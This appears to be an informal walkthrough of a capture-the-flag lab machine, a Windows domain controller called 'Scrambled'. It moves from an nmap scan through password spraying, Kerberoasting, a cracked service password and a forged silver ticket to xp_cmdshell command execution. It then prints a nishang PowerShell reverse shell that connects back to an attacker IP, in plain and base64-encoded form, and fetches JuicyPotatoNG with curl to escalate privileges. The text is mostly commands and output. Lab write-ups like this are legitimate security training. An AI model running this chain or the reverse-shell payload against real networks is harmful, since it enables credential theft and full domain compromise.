b
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 23:45 IST
Nmap scan report for 10.10.11.168
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-28 18:15:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
|_ssl-date: 2024-02-28T18:18:59+00:00; 0s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-28T18:15:27
|_Not valid after: 2054-02-28T18:15:27
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-28T18:18:59+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after: 2023-06-09T15:30:57
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49741/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=2/28%Time=65DF7853%P=x86_64-pc-linux-gnu%r
SF:(NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMB
SF:LECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.
SF:0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_OR
SF:DERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMB
SF:LECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"
SF:SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLE
SF:CORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDE
SF:RS_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UN
SF:KNOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\
SF:r\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(
SF:TLSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SC
SF:RAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_
SF:V1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Fo
SF:urOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMM
SF:AND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNO
SF:WN_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:")%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,3
SF:5,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LAND
SF:esk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3
SF:;\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORD
SF:ERS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"
SF:)%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLE
SF:CORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\
SF:n");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-28T18:18:20
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.37 seconds
I ll edit /etc/hosts
10.10.11.168 DC1.scrm.local scrm.local dc1.scrm.local
Port 80...
because NTLM is disabled we wont' be able to use many tools like smbclient as they use NTLM authentication.
smbclient -L ////10.10.11.168//
Password for [WORKGROUP\user]:
session setup failed: NT_STATUS_NOT_SUPPORTED
The error says Not supported, it does not say authentication failiure.
Supportrequest.html
We see two usernames.
password.html
I ll use kerbrute to see if the two usernames i got are valid.
➜ Scrambled /opt/kerbrute userenum --dc dc1.scrm.local -d scrm.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/29/24 - Ronnie Flathers @ropnop
2024/02/29 10:47:58 > Using KDC(s):
2024/02/29 10:47:58 > dc1.scrm.local:88
2024/02/29 10:47:58 > [+] VALID USERNAME: ksimpson@scrm.local
2024/02/29 10:47:58 > Done! Tested 2 usernames (1 valid) in 0.312 seconds
ksimpson is a valid username.
as the password.html suggestedOur self service password reset system will be up and running soon but in the meantime please call the IT support line and we will reset your password. If no one is available please leave a message stating your username and we will reset your password to be the same as the username.
I ll try for ksimpson as password.
➜ Scrambled /opt/kerbrute passwordspray users --user-as-pass --dc dc1.scrm.local -d scrm.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/29/24 - Ronnie Flathers @ropnop
2024/02/29 10:50:45 > Using KDC(s):
2024/02/29 10:50:45 > dc1.scrm.local:88
2024/02/29 10:50:46 > [+] VALID LOGIN: ksimpson@scrm.local:ksimpson
2024/02/29 10:50:46 > Done! Tested 2 logins (1 successes) in 0.836 seconds
ksimpson:ksimpson is a valid password.
I ll create a tgt as ksimpson user using impacket-getTGT
working of the tool ->
The user provides their username and password to the tool.
The tool uses these credentials to request a TGT from the Kerberos Key Distribution Center (KDC).
The KDC checks the user's credentials and, if they are valid, issues a TGT.
The tool receives the TGT and can use it to authenticate to other services within the network.
➜ ccache impacket-getTGT scrm.local/ksimpson:ksimpson
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in ksimpson.ccache
ksimpson.ccache will be created in current working directory.
We need to export it.
export KRB5CCNAME=ksimpson.ccache
Now I ll perform kerberoasting using GetUserSPNS
➜ ccache impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
And now to get the hash I LL use -request
➜ ccache impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -k -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 22:02:02.351452 2024-02-28 23:45:25.189993
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$553e6a7235a3bf50145de19ebcd28d8d$12a73c4f4b18ef46f30ffd0970ac6f801ce23f3fe774c8e7a9f45d012d3cb3af1408e1a8566375465220c3e98710bf3ab9964a20f92a8524cd819bd6306064ea6bb5f1fb05bb82dfac8cb740fd55ae262846fe64eb8c50e5f0185f2bfbe3766141f5c9360795f7cc7b4c9dc138fead6d882500427cd648af0b83e9940018977bd43b8a7edf1ee3a50db678dd67343092ed941cf481a3ddae74b895a320867c4b4d0ca1a865d9018724328431f2a10eb8157c24704963ba15b679cb99acf00874bc528f8dde5d481df12a2b4e33b5e9750d0d817fc08a35cc2e22e545cfd9262dd3a680531707bc8f926bb99cbd377bcbdef3448f98aa764faeb9371173bff804b6ac90d14e9c52f82c2acb03150df3df00eaa237f6a37651ef5f68f4b6854b9acbe3ae8254ceb1f4ac9c129e7166837b109445bc5f265e8986102d7e8d437291c9a010168cb8a3fe9c0363efe5d8975f406f07a59f415c45467dc8e108d287664d70dd2f056d5744484f701deda539cd960bbddb0da1bb0c3f27a022decc68ee666295b812c2f60e8c6832904c159db3e179508b02c2251c56ba8fd6890714d2f43d04b3157c21352bd31d0982ffb43ef51820805ea84806c1cc8d6c2923d7df16b1287c9fd28b265c7780d46de9a763ca4e87a7541bb1e63fd771bd851aa9b53fca973ea60628656949c59ce1620119471d71f3064ec7808062e60f589217da19e907a197be260a4312702b57925319408be45bc573c4d23c081aea425dc71d3a764ccfb99ba62e426967290eda363d67c355a56078c5838c48a0bd3eb106a0d1e35be26aba044033e550ee5e74dbf64117645fe4c67c3dfa9e47d431f654d0f83b867846b9e0dadd9984e68e0d8836be46f03cfe59031851738f5085a295ebd2426451c1770686a53b24600bb797bcf2af42a7527d17b5ceb1a5e2544e75d90af0fd1ddcedaa3440bfe3d6da243259b0f5b9b21a23298c0c22843a17e7f7947465b8965a33063e1b1551966f121d58ae161191242e1c301f595b761151859d2b27a95c73aa3ae7741a08b1776591b7a5dd1c24bfe89377a7170585fc19f1623f5b860aaee571cbf0f6026d9f1a5c572259d0314889b198b1c8a6672df9c7c3f26429169f5175c44abc249eb02026b032d81c22d1e243ebe1630916bb5d3e9b19f6a10b6b66decbf3a24e2f64f808e8ac26b9bc1802a5b2bb8d881e7c4825df0862f9c504f95580374ed4e9e5fbd0e179df81e84987719abc613f1891d0c4187e588083bfa881414355ef419b6fd735dff1daa90879d38dbd2e1c960a583b5c743920f8b2c9f08b20c83b0a0b29486d73b51289fb82a8ba9990e20a66cfb4569ee53cafca13b8282154718432b6b9f13e0240408d4c7d3acb02d864e095b6bd68b21f2086e0b379cb4520e6c0bc5541f34d8e7526765ba37be244
Crack the hash using hashcat.
sqlsvc:Pegasus60
There is mssql service running on port 1433 I ll use this creds to log in but I need to forge a ticket as the sqlsvc user and export the it in KRB5CCNAME
➜ ccache impacket-getTGT scrm.local/sqlsvc:Pegasus60
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Saving ticket in sqlsvc.ccache
➜ ccache export KRB5CCNAME=sqlsvc.ccache
It did not work.
➜ ccache impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'.
I ll create a silver ticket in order for this to work and for that we need NTLM hash of Pegasus60
https://codebeautify.org/ntlm-hash-generator
B999A16500B87D17EC7F2E2A68778F05
Now we need a usersid and domain sid
impacket-getPac -targetUser administrator scrm.local/ksimpson
domainsid : S-1-5-21-2743207045-1827831105-2542523200
usersid:500
Now I ll forge a TGS ticket
➜ ccache impacket-ticketer -spn MSSQLSvc/dc1.scrm.local -user-id 500 Administrator -nthash B999A16500B87D17EC7F2E2A68778F05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dc1.scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncASRepPart
[*] Saving ticket in Administrator.ccache
export KRB5CCNAME=Administrator.ccache
➜ ccache impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)>
I ll get a reverse shell. I ll use nishang
cp /opt/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 rev.ps1
➜ ccache cat rev.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.38',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Transferring this is a pain, windows like the little endian format I ll convert it into it.
➜ ccache cat rev.ps1|iconv -t UTF-16LE | base64 -w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMwA4ACcALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgAKAAoA
Start a nc listener on port 9001
and use xp_cmdshell to get a shell xp_cmdshell powershell -enc base64stuff 
Shell
Using whoami /priv
PS C:\Windows\system32> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We have impersonate privileges so we can potato attack to become admin.
I ll use juicy [potato][https://github.com/antonioCoco/JuicyPotatoNG]
Download and upload the file to target using curl
PS C:\programdata> curl 10.10.14.38/JuicyPotatoNG.exe -o jp.exe
The nishang shell that we used a converted to base64 to get a revshell as svc user I ll use it again to get a shell as admin
for that I ll insert that base64 payload in a .bat file and then use juicy potato to execute it as admin user and get a reverse shell.
echo 'powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4AMwA4ACcALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkACgAKAAoA' > hello.bat
./jp.exe -t * -p C:\ProgramData\hello.bat
Root
User.txt is in ->
PS C:\users\miscsvc\Desktop> dir
Directory: C:\users\miscsvc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 28/02/2024 18:15 34 user.txt